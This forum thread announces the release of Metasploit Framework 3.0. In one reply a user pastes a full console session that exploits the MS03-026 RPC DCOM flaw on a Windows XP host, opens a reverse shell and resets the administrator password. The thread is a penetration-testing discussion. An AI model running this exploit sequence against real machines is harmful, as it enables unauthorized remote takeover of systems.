Results 1 to 3 of 3

Thread: Metasploit Framework 3.0 out!

  1. #1
    Senior Member kr5kernel's Avatar
    Join Date
    Mar 2004
    Posts
    347

    Metasploit Framework 3.0 out!

    http://framework.metasploit.com

    They appear to be bogged down, but a definite must for pen testing.
    kr5kernel
    (kr5kernel at hotmail dot com)
    Linux: Making Penguins Cool Since 1994.

  2. #2
    Member
    Join Date
    Mar 2007
    Location
    Noida
    Posts
    34
    ---------------------------
    www.IndiaEsecure.com

  3. #3
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795

    Metasploit v2.7 works aswell.

    [*] Starting the Metasploit Framework...

    __. .__. .__. __.
    _____ _____/ |______ ____________ | | ____ |__|/ |_
    / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
    | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
    |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
    \/ \/ \/ \/ |__|

    + -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
    msf > use msrpc_dcom_ms03_026
    msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.101
    RHOST -> 192.168.1.101
    msf msrpc_dcom_ms03_026(win32_reverse) > set RPORT 135
    RPORT -> 135
    msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.100
    LHOST -> 192.168.1.100
    msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
    LPORT -> 4321
    msf msrpc_dcom_ms03_026(win32_reverse) > exploit[*] Starting Reverse Handler.[*] Sending request...[*] Got connection from 192.168.1.100:4321 <-> 192.168.1.101:3054
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>net users administrator *
    Type a password for the user:
    Retype the password to confirm:
    The command completed successfully.

    C:\WINDOWS\system32>Caught interrupt, exit connection? [y/n] y[*] Exiting Reverse Handler.
    msf msrpc_dcom_ms03_026(win32_reverse) >

Similar Threads

  1. Metasploit 2.6 Released
    By HTRegz in forum Network Security Discussions
    Replies: 8
    Last Post: May 26th, 2006, 03:03 PM
  2. nmap and metasploit glue project
    By LudakoT in forum IDS & Scanner Discussions
    Replies: 4
    Last Post: March 23rd, 2006, 04:43 AM
  3. Metasploit Framework 2.5 has been realeased
    By mmkhan in forum IDS & Scanner Discussions
    Replies: 0
    Last Post: October 20th, 2005, 05:57 AM
  4. what is a development framework?
    By slinky2004 in forum General Programming Questions
    Replies: 3
    Last Post: October 11th, 2004, 09:09 PM
  5. The history of the Mac line of Operating systems
    By gore in forum Operating Systems
    Replies: 3
    Last Post: March 7th, 2004, 08:02 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •